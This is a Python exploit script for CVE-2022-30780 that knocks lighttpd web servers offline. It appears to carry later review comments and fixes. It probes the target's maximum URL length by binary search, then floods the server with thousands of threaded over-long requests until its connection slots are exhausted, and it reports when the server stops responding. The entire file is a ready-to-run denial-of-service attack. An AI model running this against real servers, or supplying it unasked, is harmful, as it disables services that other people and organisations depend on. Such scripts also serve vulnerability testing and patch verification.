#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : CVE-2022-30780-lighttpd-denial-of-service.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 July 2021

import argparse
import time
from concurrent.futures import ThreadPoolExecutor
from enum import Enum

import requests


class RequestStatus(Enum):
    """Outcome of a single probe request against the target server."""
    OK = 0
    HTTP_200 = 200
    HTTP_403 = 403
    HTTP_404 = 404
    HTTP_500 = 500
    ReadTimeout = 1001
    ConnectTimeout = 1002
    ConnectionError = 1003


def test(baseurl, lenght, timeout=1):
    """Send one GET request whose full URL is exactly `lenght` characters long.

    The path is padded with '.' characters so that
    len(baseurl + '/' + dots + '/') == lenght.

    NOTE(review): the parameter name `lenght` is a typo but is kept
    unchanged for backward compatibility with keyword callers.

    :param baseurl: base URL (scheme + host, no trailing slash).
    :param lenght: total target URL length, in characters.
    :param timeout: per-request timeout in seconds.
    :return: a RequestStatus describing how the request ended. Any HTTP
             response (whatever the status code) is reported as OK; only
             transport-level failures map to the error members.
    """
    try:
        # +2 accounts for the two '/' separators added around the padding.
        padding = lenght - (len(baseurl) + 2)
        testurl = baseurl + '/' + "." * padding + "/"
        requests.get(testurl, timeout=timeout)
    except requests.exceptions.ReadTimeout:
        return RequestStatus.ReadTimeout
    except requests.exceptions.ConnectTimeout:
        return RequestStatus.ConnectTimeout
    except requests.exceptions.ConnectionError:
        return RequestStatus.ConnectionError
    return RequestStatus.OK


def dichotomic_search(url, timeout=1, verbose=False):
    """Binary-search the maximum URL length the server accepts.

    Starts at length 1000 with step 1000; grows while requests succeed,
    halves the step and backs off when they start failing, until the step
    reaches 1 or the length leaves the (0, 150000] sanity window.

    :param url: base URL to probe.
    :param timeout: per-request timeout in seconds.
    :param verbose: print every probe result when True.
    :return: the maximum URL length found, or None on failure.
    """
    print("[>] Performing dichotomic search to find maximum URL length ...")
    urllen, step = 1000, 1000
    normal_response = test(url, len(url), timeout=timeout)
    last_result = normal_response
    # Fixed: the original compared last_result == normal_response right after
    # assigning one to the other (always true), so the connection-failure
    # branch was unreachable. Bail out when the baseline request itself
    # could not reach the server.
    if normal_response in (RequestStatus.ConnectTimeout,
                           RequestStatus.ConnectionError):
        print("[!] Could not connect to this URL. (%s)" % last_result)
        return None
    while step >= 1 and 0 < urllen <= 150000:
        result = test(url, urllen, timeout=timeout)
        if verbose:
            print("   [>] Testing URL length %d, (%s => %s)" % (urllen, result.name, last_result.name))
        if last_result == RequestStatus.OK:
            if result == RequestStatus.OK:
                # Still accepted: keep growing.
                urllen = urllen + step
            else:
                # Too long: halve the step and back off.
                step = step // 2
                urllen = urllen - step
        else:
            if result == normal_response:
                # Back in the accepted range: halve the step and grow again.
                step = step // 2
                urllen = urllen + step
            else:
                # Still too long.
                urllen = urllen - step
        last_result = result
    if urllen <= 0 or urllen >= 150000:
        print("[!] Could not determine maximum URL length.")
        print("[!] Maybe we can't connect to this URL or this lighttpd is not vulnerable?")
        return None
    print("[+] Found maximum URL length %d" % urllen)
    return urllen


def worker(baseurl, max_url_len, monitor_data):
    """Send one over-long request (max_url_len + 1) to consume a server slot.

    Updates the shared `monitor_data` counters read by monitor_thread.
    NOTE(review): the dict increments are not atomic across threads; under
    heavy contention counts may drift slightly — acceptable for monitoring.

    :return: "ReadTimeout"/"ConnectTimeout" on timeout, None otherwise.
    """
    try:
        # One character past the maximum: lighttpd keeps the socket busy.
        padding = (max_url_len + 1) - (len(baseurl) + 2)
        testurl = baseurl + '/' + "." * padding + "/"
        monitor_data["sent"] = monitor_data["sent"] + 1
        requests.get(testurl, timeout=1)
    except requests.exceptions.ReadTimeout:
        monitor_data["ReadTimeout"] = monitor_data["ReadTimeout"] + 1
        return "ReadTimeout"
    except requests.exceptions.ConnectTimeout:
        monitor_data["ConnectTimeout"] = monitor_data["ConnectTimeout"] + 1
        return "ConnectTimeout"
    return None


def monitor_thread(monitor_data):
    """Print progress every 0.5 s and detect the denial-of-service condition.

    The DoS is assumed reached after 4 consecutive intervals in which new
    ConnectTimeouts appear without any new ReadTimeouts (the server has
    stopped accepting connections); remaining worker futures are then
    cancelled.

    :param monitor_data: shared dict with keys total/sent/ReadTimeout/
                         ConnectTimeout/tasks, mutated by worker().
    """
    refresh_rate = 0.5
    dos_count = 0
    mon_last, mon_now = monitor_data.copy(), monitor_data.copy()
    while monitor_data["sent"] < monitor_data["total"] and dos_count <= 3:
        mon_now = monitor_data.copy()
        diff_ct = (mon_now["ConnectTimeout"] - mon_last["ConnectTimeout"])
        diff_rt = (mon_now["ReadTimeout"] - mon_last["ReadTimeout"])
        # Fixed: requests-per-second is delta / interval, not delta * interval
        # (the original halved the real rate with a 0.5 s refresh).
        rate = (mon_now["sent"] - mon_last["sent"]) / refresh_rate
        if (diff_ct > 0) and (diff_rt == 0):
            # Sockets disabled: connection limit reached.
            dos_count += 1
            print("\r[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d (sockets disabled, connection limit reached) " % (
                mon_now["sent"], mon_now["total"],
                (mon_now["sent"] / mon_now["total"]) * 100,
                rate,
                mon_now["ConnectTimeout"], mon_now["ReadTimeout"])
            )
        else:
            dos_count = 0
            print("\r[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d " % (
                mon_now["sent"], mon_now["total"],
                (mon_now["sent"] / mon_now["total"]) * 100,
                rate,
                mon_now["ConnectTimeout"], mon_now["ReadTimeout"])
            )
        mon_last = mon_now
        time.sleep(refresh_rate)
    print()
    # If DoS detected, terminate all pending threads.
    # NOTE(review): Future.cancel() only stops futures that have not started
    # running yet; in-flight requests finish on their own 1 s timeout.
    if dos_count > 3:
        for t in monitor_data["tasks"]:
            t.cancel()


def parseArgs():
    """Parse the command-line options for the exploit."""
    parser = argparse.ArgumentParser(description="CVE-2022-30780-lighttpd-denial-of-service")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose mode")
    parser.add_argument("-u", "--url", dest="url", action="store", type=str, required=True, help="URL to connect to.")
    parser.add_argument("-k", "--insecure", dest="insecure_tls", action="store_true", default=False, help="Allow insecure server connections when using SSL (default: False)")
    # Fixed: help text said "default: 20" while the actual default is 256.
    parser.add_argument("-t", "--threads", dest="threads", action="store", type=int, default=256, required=False, help="Number of threads (default: 256)")
    return parser.parse_args()


if __name__ == '__main__':
    options = parseArgs()

    # lighttpd defaults, see https://redmine.lighttpd.net/issues/3059
    server_max_fds = 8192
    server_max_connections = 8192

    if not options.url.startswith(("http://", "https://")):
        options.url = "https://" + options.url
    options.url = options.url.rstrip('/')

    if options.insecure_tls:
        # Disable warnings of insecure connection for invalid certificates
        requests.packages.urllib3.disable_warnings()
        # Allow use of deprecated and weak cipher methods
        requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        try:
            requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        except AttributeError:
            pass
        # NOTE(review): -k never passes verify=False to requests.get(), so
        # certificate verification is still enforced — confirm intent.

    # Detecting maximum URL length
    max_url_len = dichotomic_search(options.url, timeout=1, verbose=options.verbose)

    if max_url_len is not None:
        monitor_data = {
            "total": server_max_connections,
            "sent": 0,
            "ReadTimeout": 0,
            "ConnectTimeout": 0,
            "tasks": []
        }
        # Waits for all the threads to be completed
        with ThreadPoolExecutor(max_workers=min(options.threads, server_max_connections)) as tp:
            tp.submit(monitor_thread, monitor_data)
            for k in range(server_max_connections):
                t = tp.submit(worker, options.url, max_url_len, monitor_data)
                monitor_data["tasks"].append(t)
        print("[>] All done! Remote server at %s should not be responding anymore." % options.url)